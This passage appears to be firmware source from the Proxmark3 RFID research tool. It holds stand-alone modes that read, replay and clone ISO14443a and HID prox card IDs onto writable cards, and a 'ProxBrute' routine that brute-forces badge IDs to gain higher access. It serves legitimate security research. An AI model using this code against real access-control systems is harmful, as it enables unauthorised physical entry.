SendVersion(void) 297 | { 298 | char temp[USB_CMD_DATA_SIZE]; /* Limited data payload in USB packets */ 299 | char VersionString[USB_CMD_DATA_SIZE] = { '\0' }; 300 | 301 | /* Try to find the bootrom version information. Expect to find a pointer at 302 | * symbol _bootphase1_version_pointer, perform slight sanity checks on the 303 | * pointer, then use it. 304 | */ 305 | char *bootrom_version = *(char**)&_bootphase1_version_pointer; 306 | if( bootrom_version < &_flash_start || bootrom_version >= &_flash_end ) { 307 | strcat(VersionString, "bootrom version information appears invalid\n"); 308 | } else { 309 | FormatVersionInformation(temp, sizeof(temp), "bootrom: ", bootrom_version); 310 | strncat(VersionString, temp, sizeof(VersionString) - strlen(VersionString) - 1); 311 | } 312 | 313 | FormatVersionInformation(temp, sizeof(temp), "os: ", &version_information); 314 | strncat(VersionString, temp, sizeof(VersionString) - strlen(VersionString) - 1); 315 | 316 | FpgaGatherVersion(FPGA_BITSTREAM_LF, temp, sizeof(temp)); 317 | strncat(VersionString, temp, sizeof(VersionString) - strlen(VersionString) - 1); 318 | FpgaGatherVersion(FPGA_BITSTREAM_HF, temp, sizeof(temp)); 319 | strncat(VersionString, temp, sizeof(VersionString) - strlen(VersionString) - 1); 320 | 321 | // Send Chip ID and used flash memory 322 | uint32_t text_and_rodata_section_size = (uint32_t)&__data_src_start__ - (uint32_t)&_flash_start; 323 | uint32_t compressed_data_section_size = common_area.arg1; 324 | cmd_send(CMD_ACK, *(AT91C_DBGU_CIDR), text_and_rodata_section_size + compressed_data_section_size, 0, VersionString, strlen(VersionString)); 325 | } 326 | 327 | // measure the USB Speed by sending SpeedTestBufferSize bytes to client and measuring the elapsed time. 328 | // Note: this mimics GetFromBigbuf(), i.e. we have the overhead of the UsbCommand structure included. 329 | void printUSBSpeed(void) 330 | { 331 | Dbprintf("USB Speed:"); 332 | Dbprintf(" Sending USB packets to client..."); 333 | 334 | #define USB_SPEED_TEST_MIN_TIME 1500 // in milliseconds 335 | uint8_t *test_data = BigBuf_get_addr(); 336 | uint32_t end_time; 337 | 338 | uint32_t start_time = end_time = GetTickCount(); 339 | uint32_t bytes_transferred = 0; 340 | 341 | LED_B_ON(); 342 | while(end_time < start_time + USB_SPEED_TEST_MIN_TIME) { 343 | cmd_send(CMD_DOWNLOADED_RAW_ADC_SAMPLES_125K, 0, USB_CMD_DATA_SIZE, 0, test_data, USB_CMD_DATA_SIZE); 344 | end_time = GetTickCount(); 345 | bytes_transferred += USB_CMD_DATA_SIZE; 346 | } 347 | LED_B_OFF(); 348 | 349 | Dbprintf(" Time elapsed: %dms", end_time - start_time); 350 | Dbprintf(" Bytes transferred: %d", bytes_transferred); 351 | Dbprintf(" USB Transfer Speed PM3 -> Client = %d Bytes/s", 352 | 1000 * bytes_transferred / (end_time - start_time)); 353 | 354 | } 355 | 356 | /** 357 | * Prints runtime information about the PM3. 358 | **/ 359 | void SendStatus(void) 360 | { 361 | BigBuf_print_status(); 362 | Fpga_print_status(); 363 | printConfig(); //LF Sampling config 364 | printUSBSpeed(); 365 | Dbprintf("Various"); 366 | Dbprintf(" MF_DBGLEVEL......%d", MF_DBGLEVEL); 367 | Dbprintf(" ToSendMax........%d",ToSendMax); 368 | Dbprintf(" ToSendBit........%d",ToSendBit); 369 | 370 | cmd_send(CMD_ACK,1,0,0,0,0); 371 | } 372 | 373 | #if defined(WITH_ISO14443a_StandAlone) || defined(WITH_LF) 374 | 375 | #define OPTS 2 376 | 377 | void StandAloneMode() 378 | { 379 | DbpString("Stand-alone mode! No PC necessary."); 380 | // Oooh pretty -- notify user we're in elite samy mode now 381 | LED(LED_RED, 200); 382 | LED(LED_ORANGE, 200); 383 | LED(LED_GREEN, 200); 384 | LED(LED_ORANGE, 200); 385 | LED(LED_RED, 200); 386 | LED(LED_ORANGE, 200); 387 | LED(LED_GREEN, 200); 388 | LED(LED_ORANGE, 200); 389 | LED(LED_RED, 200); 390 | 391 | } 392 | 393 | #endif 394 | 395 | 396 | 397 | #ifdef WITH_ISO14443a_StandAlone 398 | void StandAloneMode14a() 399 | { 400 | StandAloneMode(); 401 | FpgaDownloadAndGo(FPGA_BITSTREAM_HF); 402 | 403 | int selected = 0; 404 | int playing = 0, iGotoRecord = 0, iGotoClone = 0; 405 | int cardRead[OPTS] = {0}; 406 | uint8_t readUID[10] = {0}; 407 | uint32_t uid_1st[OPTS]={0}; 408 | uint32_t uid_2nd[OPTS]={0}; 409 | uint32_t uid_tmp1 = 0; 410 | uint32_t uid_tmp2 = 0; 411 | iso14a_card_select_t hi14a_card[OPTS]; 412 | 413 | LED(selected + 1, 0); 414 | 415 | for (;;) 416 | { 417 | usb_poll(); 418 | WDT_HIT(); 419 | SpinDelay(300); 420 | 421 | if (iGotoRecord == 1 || cardRead[selected] == 0) 422 | { 423 | iGotoRecord = 0; 424 | LEDsoff(); 425 | LED(selected + 1, 0); 426 | LED(LED_RED2, 0); 427 | 428 | // record 429 | Dbprintf("Enabling iso14443a reader mode for [Bank: %u]...", selected); 430 | /* need this delay to prevent catching some weird data */ 431 | SpinDelay(500); 432 | /* Code for reading from 14a tag */ 433 | uint8_t uid[10] ={0}; 434 | uint32_t cuid; 435 | iso14443a_setup(FPGA_HF_ISO14443A_READER_MOD); 436 | 437 | for ( ; ; ) 438 | { 439 | WDT_HIT(); 440 | if (BUTTON_PRESS()) { 441 | if (cardRead[selected]) { 442 | Dbprintf("Button press detected -- replaying card in bank[%d]", selected); 443 | break; 444 | } 445 | else if (cardRead[(selected+1)%OPTS]) { 446 | Dbprintf("Button press detected but no card in bank[%d] so playing from bank[%d]", selected, (selected+1)%OPTS); 447 | selected = (selected+1)%OPTS; 448 | break; // playing = 1; 449 | } 450 | else { 451 | Dbprintf("Button press detected but no stored tag to play. (Ignoring button)"); 452 | SpinDelay(300); 453 | } 454 | } 455 | if (!iso14443a_select_card(uid, &hi14a_card[selected], &cuid)) 456 | continue; 457 | else 458 | { 459 | Dbprintf("Read UID:"); Dbhexdump(10,uid,0); 460 | memcpy(readUID,uid,10*sizeof(uint8_t)); 461 | uint8_t *dst = (uint8_t *)&uid_tmp1; 462 | // Set UID byte order 463 | for (int i=0; i<4; i++) 464 | dst[i] = uid[3-i]; 465 | dst = (uint8_t *)&uid_tmp2; 466 | for (int i=0; i<4; i++) 467 | dst[i] = uid[7-i]; 468 | if (uid_1st[(selected+1)%OPTS] == uid_tmp1 && uid_2nd[(selected+1)%OPTS] == uid_tmp2) { 469 | Dbprintf("Card selected has same UID as what is stored in the other bank. Skipping."); 470 | } 471 | else { 472 | if (uid_tmp2) { 473 | Dbprintf("Bank[%d] received a 7-byte UID",selected); 474 | uid_1st[selected] = (uid_tmp1)>>8; 475 | uid_2nd[selected] = (uid_tmp1<<24) + (uid_tmp2>>8); 476 | } 477 | else { 478 | Dbprintf("Bank[%d] received a 4-byte UID",selected); 479 | uid_1st[selected] = uid_tmp1; 480 | uid_2nd[selected] = uid_tmp2; 481 | } 482 | break; 483 | } 484 | } 485 | } 486 | Dbprintf("ATQA = %02X%02X",hi14a_card[selected].atqa[0],hi14a_card[selected].atqa[1]); 487 | Dbprintf("SAK = %02X",hi14a_card[selected].sak); 488 | LEDsoff(); 489 | LED(LED_GREEN, 200); 490 | LED(LED_ORANGE, 200); 491 | LED(LED_GREEN, 200); 492 | LED(LED_ORANGE, 200); 493 | 494 | LEDsoff(); 495 | LED(selected + 1, 0); 496 | 497 | // Next state is replay: 498 | playing = 1; 499 | 500 | cardRead[selected] = 1; 501 | } 502 | /* MF Classic UID clone */ 503 | else if (iGotoClone==1) 504 | { 505 | iGotoClone=0; 506 | LEDsoff(); 507 | LED(selected + 1, 0); 508 | LED(LED_ORANGE, 250); 509 | 510 | 511 | // record 512 | Dbprintf("Preparing to Clone card [Bank: %x]; uid: %08x", selected, uid_1st[selected]); 513 | 514 | // wait for button to be released 515 | while(BUTTON_PRESS()) 516 | { 517 | // Delay cloning until card is in place 518 | WDT_HIT(); 519 | } 520 | Dbprintf("Starting clone. [Bank: %u]", selected); 521 | // need this delay to prevent catching some weird data 522 | SpinDelay(500); 523 | // Begin clone function here: 524 | /* Example from client/mifarehost.c for commanding a block write for "magic Chinese" cards: 525 | UsbCommand c = {CMD_MIFARE_CSETBLOCK, {wantWipe, params & (0xFE | (uid == NULL ? 0:1)), blockNo}}; 526 | memcpy(c.d.asBytes, data, 16); 527 | SendCommand(&c); 528 | 529 | Block read is similar: 530 | UsbCommand c = {CMD_MIFARE_CGETBLOCK, {params, 0, blockNo}}; 531 | We need to imitate that call with blockNo 0 to set a uid. 532 | 533 | The get and set commands are handled in this file: 534 | // Work with "magic Chinese" card 535 | case CMD_MIFARE_CSETBLOCK: 536 | MifareCSetBlock(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 537 | break; 538 | case CMD_MIFARE_CGETBLOCK: 539 | MifareCGetBlock(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 540 | break; 541 | 542 | mfCSetUID provides example logic for UID set workflow: 543 | -Read block0 from card in field with MifareCGetBlock() 544 | -Configure new values without replacing reserved bytes 545 | memcpy(block0, uid, 4); // Copy UID bytes from byte array 546 | // Mifare UID BCC 547 | block0[4] = block0[0]^block0[1]^block0[2]^block0[3]; // BCC on byte 5 548 | Bytes 5-7 are reserved SAK and ATQA for mifare classic 549 | -Use mfCSetBlock(0, block0, oldUID, wantWipe, CSETBLOCK_SINGLE_OPER) to write it 550 | */ 551 | uint8_t oldBlock0[16] = {0}, newBlock0[16] = {0}, testBlock0[16] = {0}; 552 | // arg0 = Flags == CSETBLOCK_SINGLE_OPER=0x1F, arg1=returnSlot, arg2=blockNo 553 | MifareCGetBlock(0x3F, 1, 0, oldBlock0); 554 | if (oldBlock0[0] == 0 && oldBlock0[0] == oldBlock0[1] && oldBlock0[1] == oldBlock0[2] && oldBlock0[2] == oldBlock0[3]) { 555 | Dbprintf("No changeable tag detected. Returning to replay mode for bank[%d]", selected); 556 | playing = 1; 557 | } 558 | else { 559 | Dbprintf("UID from target tag: %02X%02X%02X%02X", oldBlock0[0],oldBlock0[1],oldBlock0[2],oldBlock0[3]); 560 | memcpy(newBlock0,oldBlock0,16); 561 | // Copy uid_1st for bank (2nd is for longer UIDs not supported if classic) 562 | 563 | newBlock0[0] = uid_1st[selected]>>24; 564 | newBlock0[1] = 0xFF & (uid_1st[selected]>>16); 565 | newBlock0[2] = 0xFF & (uid_1st[selected]>>8); 566 | newBlock0[3] = 0xFF & (uid_1st[selected]); 567 | newBlock0[4] = newBlock0[0]^newBlock0[1]^newBlock0[2]^newBlock0[3]; 568 | // arg0 = needWipe, arg1 = workFlags, arg2 = blockNo, datain 569 | MifareCSetBlock(0, 0xFF,0, newBlock0); 570 | MifareCGetBlock(0x3F, 1, 0, testBlock0); 571 | if (memcmp(testBlock0,newBlock0,16)==0) 572 | { 573 | DbpString("Cloned successfull!"); 574 | cardRead[selected] = 0; // Only if the card was cloned successfully should we clear it 575 | playing = 0; 576 | iGotoRecord = 1; 577 | selected = (selected+1) % OPTS; 578 | } 579 | else { 580 | Dbprintf("Clone failed. Back to replay mode on bank[%d]", selected); 581 | playing = 1; 582 | } 583 | } 584 | LEDsoff(); 585 | LED(selected + 1, 0); 586 | 587 | } 588 | // Change where to record (or begin playing) 589 | else if (playing==1) // button_pressed == BUTTON_SINGLE_CLICK && cardRead[selected]) 590 | { 591 | LEDsoff(); 592 | LED(selected + 1, 0); 593 | 594 | // Begin transmitting 595 | if (playing) 596 | { 597 | LED(LED_GREEN, 0); 598 | DbpString("Playing"); 599 | for ( ; ; ) { 600 | WDT_HIT(); 601 | int button_action = BUTTON_HELD(1000); 602 | if (button_action == 0) { // No button action, proceed with sim 603 | uint8_t data[512] = {0}; // in case there is a read command received we shouldn't break 604 | Dbprintf("Simulating ISO14443a tag with uid[0]: %08x, uid[1]: %08x [Bank: %u]", uid_1st[selected],uid_2nd[selected],selected); 605 | if (hi14a_card[selected].sak == 8 && hi14a_card[selected].atqa[0] == 4 && hi14a_card[selected].atqa[1] == 0) { 606 | DbpString("Mifare Classic"); 607 | SimulateIso14443aTag(1,uid_1st[selected], uid_2nd[selected], data); // Mifare Classic 608 | } 609 | else if (hi14a_card[selected].sak == 0 && hi14a_card[selected].atqa[0] == 0x44 && hi14a_card[selected].atqa[1] == 0) { 610 | DbpString("Mifare Ultralight"); 611 | SimulateIso14443aTag(2,uid_1st[selected],uid_2nd[selected],data); // Mifare Ultralight 612 | } 613 | else if (hi14a_card[selected].sak == 20 && hi14a_card[selected].atqa[0] == 0x44 && hi14a_card[selected].atqa[1] == 3) { 614 | DbpString("Mifare DESFire"); 615 | SimulateIso14443aTag(3,uid_1st[selected],uid_2nd[selected],data); // Mifare DESFire 616 | } 617 | else { 618 | Dbprintf("Unrecognized tag type -- defaulting to Mifare Classic emulation"); 619 | SimulateIso14443aTag(1,uid_1st[selected], uid_2nd[selected], data); 620 | } 621 | } 622 | else if (button_action == BUTTON_SINGLE_CLICK) { 623 | selected = (selected + 1) % OPTS; 624 | Dbprintf("Done playing. Switching to record mode on bank %d",selected); 625 | iGotoRecord = 1; 626 | break; 627 | } 628 | else if (button_action == BUTTON_HOLD) { 629 | Dbprintf("Playtime over. Begin cloning..."); 630 | iGotoClone = 1; 631 | break; 632 | } 633 | WDT_HIT(); 634 | } 635 | 636 | /* We pressed a button so ignore it here with a delay */ 637 | SpinDelay(300); 638 | LEDsoff(); 639 | LED(selected + 1, 0); 640 | } 641 | else 642 | while(BUTTON_PRESS()) 643 | WDT_HIT(); 644 | } 645 | } 646 | } 647 | #elif WITH_LF 648 | // samy's sniff and repeat routine 649 | void SamyRun() 650 | { 651 | StandAloneMode(); 652 | FpgaDownloadAndGo(FPGA_BITSTREAM_LF); 653 | 654 | int high[OPTS], low[OPTS]; 655 | int selected = 0; 656 | int playing = 0; 657 | int cardRead = 0; 658 | // ProxBrute Stuff: 659 | unsigned int i; 660 | unsigned int ZERO=0x00000000; 661 | // Turn on selected LED 662 | LED(selected + 1, 0); 663 | 664 | for (;;) 665 | { 666 | usb_poll(); 667 | WDT_HIT(); 668 | 669 | // Was our button held down or pressed? 670 | int button_pressed = BUTTON_HELD(1000); 671 | SpinDelay(300); 672 | 673 | // Button was held for a second, begin recording 674 | if (button_pressed > 0 && cardRead == 0) 675 | { 676 | LEDsoff(); 677 | LED(selected + 1, 0); 678 | LED(LED_RED2, 0); 679 | 680 | // record 681 | DbpString("Starting recording"); 682 | 683 | // wait for button to be released 684 | while(BUTTON_PRESS()) 685 | WDT_HIT(); 686 | 687 | /* need this delay to prevent catching some weird data */ 688 | SpinDelay(500); 689 | 690 | CmdHIDdemodFSK(1, &high[selected], &low[selected], 0); 691 | Dbprintf("Recorded %x %x%08x", selected, high[selected], low[selected]); 692 | 693 | LEDsoff(); 694 | LED(selected + 1, 0); 695 | // Finished recording 696 | 697 | // If we were previously playing, set playing off 698 | // so next button push begins playing what we recorded 699 | playing = 0; 700 | 701 | cardRead = 1; 702 | 703 | } 704 | 705 | // Change where to record (or begin playing) 706 | else if (button_pressed) 707 | { 708 | // Next option if we were previously playing 709 | if (playing) 710 | selected = (selected + 1) % OPTS; 711 | playing = !playing; 712 | 713 | LEDsoff(); 714 | LED(selected + 1, 0); 715 | 716 | // Begin transmitting 717 | if (playing) 718 | { 719 | LED(LED_GREEN, 0); 720 | DbpString("Playing"); 721 | // wait for button to be released 722 | while(BUTTON_PRESS()) 723 | WDT_HIT(); 724 | /* START PROXBRUTE */ 725 | 726 | /* 727 | ProxBrute - brad a. - foundstone 728 | 729 | Following code is a trivial brute forcer once you read a valid tag 730 | the idea is you get a valid tag, then just try and brute force to 731 | another priv level. The problem is that it has no idea if the code 732 | worked or not, so its a crap shoot. One option is to time how long 733 | it takes to get a valid ID then start from scratch every time. 734 | */ 735 | 736 | if ( selected == 1 ) { 737 | DbpString("Entering ProxBrute Mode"); 738 | DbpString("brad a. - foundstone"); 739 | Dbprintf("Current Tag: Selected = %x Facility = %08x ID = %08x", selected, high[selected], low[selected]); 740 | LED(LED_ORANGE,0); 741 | LED(LED_RED,0); 742 | for (i=low[selected]-1;i>ZERO;i--) { 743 | if(BUTTON_PRESS()) { 744 | DbpString("Told to Stop"); 745 | break; 746 | } 747 | 748 | Dbprintf("Trying Facility = %08x ID %08x", high[selected], i); 749 | CmdHIDsimTAGProxBrute(high[selected], i, 0); 750 | SpinDelay(500); 751 | } 752 | 753 | } else { 754 | DbpString("Red is lit, not entering ProxBrute Mode"); 755 | Dbprintf("%x %x %x", selected, high[selected], low[selected]); 756 | CmdHIDsimTAG(high[selected], low[selected], 0); 757 | DbpString("Done playing"); 758 | } 759 | 760 | 761 | 762 | 763 | /* END PROXBRUTE */ 764 | 765 | if (BUTTON_HELD(1000) > 0) 766 | { 767 | DbpString("Exiting"); 768 | LEDsoff(); 769 | return; 770 | } 771 | 772 | /* We pressed a button so ignore it here with a delay */ 773 | SpinDelay(300); 774 | 775 | // when done, we're done playing, move to next option 776 | selected = (selected + 1) % OPTS; 777 | playing = !playing; 778 | LEDsoff(); 779 | LED(selected + 1, 0); 780 | } 781 | else 782 | while(BUTTON_PRESS()) 783 | WDT_HIT(); 784 | } 785 | } 786 | } 787 | 788 | #endif 789 | /* 790 | OBJECTIVE 791 | Listen and detect an external reader. Determine the best location 792 | for the antenna. 793 | 794 | INSTRUCTIONS: 795 | Inside the ListenReaderField() function, there is two mode. 796 | By default, when you call the function, you will enter mode 1. 797 | If you press the PM3 button one time, you will enter mode 2. 798 | If you press the PM3 button a second time, you will exit the function. 799 | 800 | DESCRIPTION OF MODE 1: 801 | This mode just listens for an external reader field and lights up green 802 | for HF and/or red for LF. This is the original mode of the detectreader 803 | function. 804 | 805 | DESCRIPTION OF MODE 2: 806 | This mode will visually represent, using the LEDs, the actual strength of the 807 | current compared to the maximum current detected. Basically, once you know 808 | what kind of external reader is present, it will help you spot the best location to place 809 | your antenna. You will probably not get some good results if there is a LF and a HF reader 810 | at the same place! :-) 811 | 812 | LIGHT SCHEME USED: 813 | */ 814 | static const char LIGHT_SCHEME[] = { 815 | 0x0, /* ---- | No field detected */ 816 | 0x1, /* X--- | 14% of maximum current detected */ 817 | 0x2, /* -X-- | 29% of maximum current detected */ 818 | 0x4, /* --X- | 43% of maximum current detected */ 819 | 0x8, /* ---X | 57% of maximum current detected */ 820 | 0xC, /* --XX | 71% of maximum current detected */ 821 | 0xE, /* -XXX | 86% of maximum current detected */ 822 | 0xF, /* XXXX | 100% of maximum current detected */ 823 | }; 824 | static const int LIGHT_LEN = sizeof(LIGHT_SCHEME)/sizeof(LIGHT_SCHEME[0]); 825 | 826 | void ListenReaderField(int limit) 827 | { 828 | int lf_av, lf_av_new, lf_baseline= 0, lf_max; 829 | int hf_av, hf_av_new, hf_baseline= 0, hf_max; 830 | int mode=1, display_val, display_max, i; 831 | 832 | #define LF_ONLY 1 833 | #define HF_ONLY 2 834 | #define REPORT_CHANGE 10 // report new values only if they have changed at least by REPORT_CHANGE 835 | 836 | 837 | // switch off FPGA - we don't want to measure our own signal 838 | FpgaDownloadAndGo(FPGA_BITSTREAM_HF); 839 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 840 | 841 | LEDsoff(); 842 | 843 | lf_av = lf_max = AvgAdc(ADC_CHAN_LF); 844 | 845 | if(limit != HF_ONLY) { 846 | Dbprintf("LF 125/134kHz Baseline: %dmV", (MAX_ADC_LF_VOLTAGE * lf_av) >> 10); 847 | lf_baseline = lf_av; 848 | } 849 | 850 | hf_av = hf_max = AvgAdc(ADC_CHAN_HF); 851 | 852 | if (limit != LF_ONLY) { 853 | Dbprintf("HF 13.56MHz Baseline: %dmV", (MAX_ADC_HF_VOLTAGE * hf_av) >> 10); 854 | hf_baseline = hf_av; 855 | } 856 | 857 | for(;;) { 858 | if (BUTTON_PRESS()) { 859 | SpinDelay(500); 860 | switch (mode) { 861 | case 1: 862 | mode=2; 863 | DbpString("Signal Strength Mode"); 864 | break; 865 | case 2: 866 | default: 867 | DbpString("Stopped"); 868 | LEDsoff(); 869 | return; 870 | break; 871 | } 872 | } 873 | WDT_HIT(); 874 | 875 | if (limit != HF_ONLY) { 876 | if(mode == 1) { 877 | if (ABS(lf_av - lf_baseline) > REPORT_CHANGE) 878 | LED_D_ON(); 879 | else 880 | LED_D_OFF(); 881 | } 882 | 883 | lf_av_new = AvgAdc(ADC_CHAN_LF); 884 | // see if there's a significant change 885 | if(ABS(lf_av - lf_av_new) > REPORT_CHANGE) { 886 | Dbprintf("LF 125/134kHz Field Change: %5dmV", (MAX_ADC_LF_VOLTAGE * lf_av_new) >> 10); 887 | lf_av = lf_av_new; 888 | if (lf_av > lf_max) 889 | lf_max = lf_av; 890 | } 891 | } 892 | 893 | if (limit != LF_ONLY) { 894 | if (mode == 1){ 895 | if (ABS(hf_av - hf_baseline) > REPORT_CHANGE) 896 | LED_B_ON(); 897 | else 898 | LED_B_OFF(); 899 | } 900 | 901 | hf_av_new = AvgAdc(ADC_CHAN_HF); 902 | // see if there's a significant change 903 | if(ABS(hf_av - hf_av_new) > REPORT_CHANGE) { 904 | Dbprintf("HF 13.56MHz Field Change: %5dmV", (MAX_ADC_HF_VOLTAGE * hf_av_new) >> 10); 905 | hf_av = hf_av_new; 906 | if (hf_av > hf_max) 907 | hf_max = hf_av; 908 | } 909 | } 910 | 911 | if(mode == 2) { 912 | if (limit == LF_ONLY) { 913 | display_val = lf_av; 914 | display_max = lf_max; 915 | } else if (limit == HF_ONLY) { 916 | display_val = hf_av; 917 | display_max = hf_max; 918 | } else { /* Pick one at random */ 919 | if( (hf_max - hf_baseline) > (lf_max - lf_baseline) ) { 920 | display_val = hf_av; 921 | display_max = hf_max; 922 | } else { 923 | display_val = lf_av; 924 | display_max = lf_max; 925 | } 926 | } 927 | for (i=0; i= ((display_max/LIGHT_LEN)*i) && display_val <= ((display_max/LIGHT_LEN)*(i+1))) { 929 | if (LIGHT_SCHEME[i] & 0x1) LED_C_ON(); else LED_C_OFF(); 930 | if (LIGHT_SCHEME[i] & 0x2) LED_A_ON(); else LED_A_OFF(); 931 | if (LIGHT_SCHEME[i] & 0x4) LED_B_ON(); else LED_B_OFF(); 932 | if (LIGHT_SCHEME[i] & 0x8) LED_D_ON(); else LED_D_OFF(); 933 | break; 934 | } 935 | } 936 | } 937 | } 938 | } 939 | 940 | void UsbPacketReceived(uint8_t *packet, int len) 941 | { 942 | UsbCommand *c = (UsbCommand *)packet; 943 | 944 | // Dbprintf("received %d bytes, with command: 0x%04x and args: %d %d %d",len,c->cmd,c->arg[0],c->arg[1],c->arg[2]); 945 | 946 | switch(c->cmd) { 947 | #ifdef WITH_LF 948 | case CMD_SET_LF_SAMPLING_CONFIG: 949 | setSamplingConfig((sample_config *) c->d.asBytes); 950 | break; 951 | case CMD_ACQUIRE_RAW_ADC_SAMPLES_125K: 952 | cmd_send(CMD_ACK,SampleLF(c->arg[0]),0,0,0,0); 953 | break; 954 | case CMD_MOD_THEN_ACQUIRE_RAW_ADC_SAMPLES_125K: 955 | ModThenAcquireRawAdcSamples125k(c->arg[0],c->arg[1],c->arg[2],c->d.asBytes); 956 | break; 957 | case CMD_LF_SNOOP_RAW_ADC_SAMPLES: 958 | cmd_send(CMD_ACK,SnoopLF(),0,0,0,0); 959 | break; 960 | case CMD_HID_DEMOD_FSK: 961 | CmdHIDdemodFSK(c->arg[0], 0, 0, 1); 962 | break; 963 | case CMD_HID_SIM_TAG: 964 | CmdHIDsimTAG(c->arg[0], c->arg[1], 1); 965 | break; 966 | case CMD_FSK_SIM_TAG: 967 | CmdFSKsimTAG(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 968 | break; 969 | case CMD_ASK_SIM_TAG: 970 | CmdASKsimTag(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 971 | break; 972 | case CMD_PSK_SIM_TAG: 973 | CmdPSKsimTag(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes); 974 | break; 975 | case CMD_HID_CLONE_TAG: 976 | CopyHIDtoT55x7(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes[0]); 977 | break; 978 | case CMD_IO_DEMOD_FSK: 979 | CmdIOdemodFSK(c->arg[0], 0, 0, 1); 980 | break; 981 | case CMD_IO_CLONE_TAG: 982 | CopyIOtoT55x7(c->arg[0], c->arg[1]); 983 | break; 984 | case CMD_EM410X_DEMOD: 985 | CmdEM410xdemod(c->arg[0], 0, 0, 1); 986 | break; 987 | case CMD_EM410X_WRITE_TAG: 988 | WriteEM410x(c->arg[0], c->arg[1], c->arg[2]); 989 | break; 990 | case CMD_READ_TI_TYPE: 991 | ReadTItag(); 992 | break; 993 | case CMD_WRITE_TI_TYPE: 994 | WriteTItag(c->arg[0],c->arg[1],c->arg[2]); 995 | break; 996 | case CMD_SIMULATE_TAG_125K: 997 | LED_A_ON(); 998 | SimulateTagLowFrequency(c->arg[0], c->arg[1], 1); 999 | LED_A_OFF(); 1000 | break; 1001 | case CMD_LF_SIMULATE_BIDIR: 1002 | SimulateTagLowFrequencyBidir(c->arg[0], c->arg[1]); 1003 | break; 1004 | case CMD_INDALA_CLONE_TAG: 1005 | CopyIndala64toT55x7(c->arg[0], c->arg[1]); 1006 | break; 1007 | case CMD_INDALA_CLONE_TAG_L: 1008 | CopyIndala224toT55x7(c->d.asDwords[0], c->d.asDwords[1], c->d.asDwords[2], c->d.asDwords[3], c->d.asDwords[4], c->d.asDwords[5], c->d.asDwords[6]); 1009 | break; 1010 | case CMD_T55XX_READ_BLOCK: 1011 | T55xxReadBlock(c->arg[0], c->arg[1], c->arg[2]); 1012 | break; 1013 | case CMD_T55XX_WRITE_BLOCK: 1014 | T55xxWriteBlock(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes[0]); 1015 | break; 1016 | case CMD_T55XX_WAKEUP: 1017 | T55xxWakeUp(c->arg[0]); 1018 | break; 1019 | case CMD_T55XX_RESET_READ: 1020 | T55xxResetRead(); 1021 | break; 1022 | case CMD_PCF7931_READ: 1023 | ReadPCF7931(); 1024 | break; 1025 | case CMD_PCF7931_WRITE: 1026 | WritePCF7931(c->d.asBytes[0],c->d.asBytes[1],c->d.asBytes[2],c->d.asBytes[3],c->d.asBytes[4],c->d.asBytes[5],c->d.asBytes[6], c->d.asBytes[9], c->d.asBytes[7]-128,c->d.asBytes[8]-128, c->arg[0], c->arg[1], c->arg[2]); 1027 | break; 1028 | case CMD_EM4X_READ_WORD: 1029 | EM4xReadWord(c->arg[1], c->arg[2],c->d.asBytes[0]); 1030 | break; 1031 | case CMD_EM4X_WRITE_WORD: 1032 | EM4xWriteWord(c->arg[0], c->arg[1], c->arg[2], c->d.asBytes[0]); 1033 | break; 1034 | case CMD_AWID_DEMOD_FSK: // Set realtime AWID demodulation 1035 | CmdAWIDdemodFSK(c->arg[0], 0, 0, 1); 1036 | break; 1037 | case CMD_VIKING_CLONE_TAG: 1038 | CopyVikingtoT55xx(c->arg[0], c->arg[1], c->arg[2]); 1039 | break; 1040 | #endif 1041 | 1042 | #ifdef WITH_HITAG 1043 | case CMD_SNOOP_HITAG: // Eavesdrop Hitag tag, args = type 1044 | SnoopHitag(c->arg[0]); 1045 | break; 1046 | case CMD_SIMULATE_HITAG: // Simulate Hitag tag, args = memory content 1047 | SimulateHitagTag((bool)c->arg[0],(byte_t*)c->d.asBytes); 1048 | break; 1049 | case CMD_READER_HITAG: // Reader for Hitag tags, args = type and function 1050 | ReaderHitag((hitag_function)c->arg[0],(hitag_data*)c->d.asBytes); 1051 | break; 1052 | case CMD_SIMULATE_HITAG_S:// Simulate Hitag s tag, args = memory content 1053 | SimulateHitagSTag((bool)c->arg[0],(byte_t*)c->d.asBytes); 1054 | break; 1055 | case CMD_TEST_HITAGS_TRACES:// Tests every challenge within the given file 1056 | check_challenges((bool)c->arg[0],(byte_t*)c->d.asBytes); 1057 | break; 1058 | case CMD_READ_HITAG_S://Reader for only Hitag S tags, args = key or challenge 1059 | ReadHitagS((hitag_function)c->arg[0],(hitag_data*)c->d.asBytes); 1060 | break; 1061 | case CMD_WR_HITAG_S://writer for Hitag tags args=data to write,page and key or challenge 1062 | WritePageHitagS((hitag_function)c->arg[0],(hitag_data*)c->d.asBytes,c->arg[2]); 1063 | break; 1064 | #endif 1065 | 1066 | #ifdef WITH_ISO15693 1067 | case CMD_ACQUIRE_RAW_ADC_SAMPLES_ISO_15693: 1068 | AcquireRawAdcSamplesIso15693(); 1069 | break; 1070 | case CMD_RECORD_RAW_ADC_SAMPLES_ISO_15693: 1071 | RecordRawAdcSamplesIso15693(); 1072 | break; 1073 | 1074 | case CMD_ISO_15693_COMMAND: 1075 | DirectTag15693Command(c->arg[0],c->arg[1],c->arg[2],c->d.asBytes); 1076 | break; 1077 | 1078 | case CMD_ISO_15693_FIND_AFI: 1079 | BruteforceIso15693Afi(c->arg[0]); 1080 | break; 1081 | 1082 | case CMD_ISO_15693_DEBUG: 1083 | SetDebugIso15693(c->arg[0]); 1084 | break; 1085 | 1086 | case CMD_READER_ISO_15693: 1087 | ReaderIso15693(c->arg[0]); 1088 | break; 1089 | case CMD_SIMTAG_ISO_15693: 1090 | SimTagIso15693(c->arg[0], c->d.asBytes); 1091 | break; 1092 | #endif 1093 | 1094 | #ifdef WITH_LEGICRF 1095 | case CMD_SIMULATE_TAG_LEGIC_RF: 1096 | LegicRfSimulate(c->arg[0], c->arg[1], c->arg[2]); 1097 | break; 1098 | 1099 | case CMD_WRITER_LEGIC_RF: 1100 | LegicRfWriter(c->arg[1], c->arg[0]); 1101 | break; 1102 | 1103 | case CMD_READER_LEGIC_RF: 1104 | LegicRfReader(c->arg[0], c->arg[1]); 1105 | break; 1106 | #endif 1107 | 1108 | 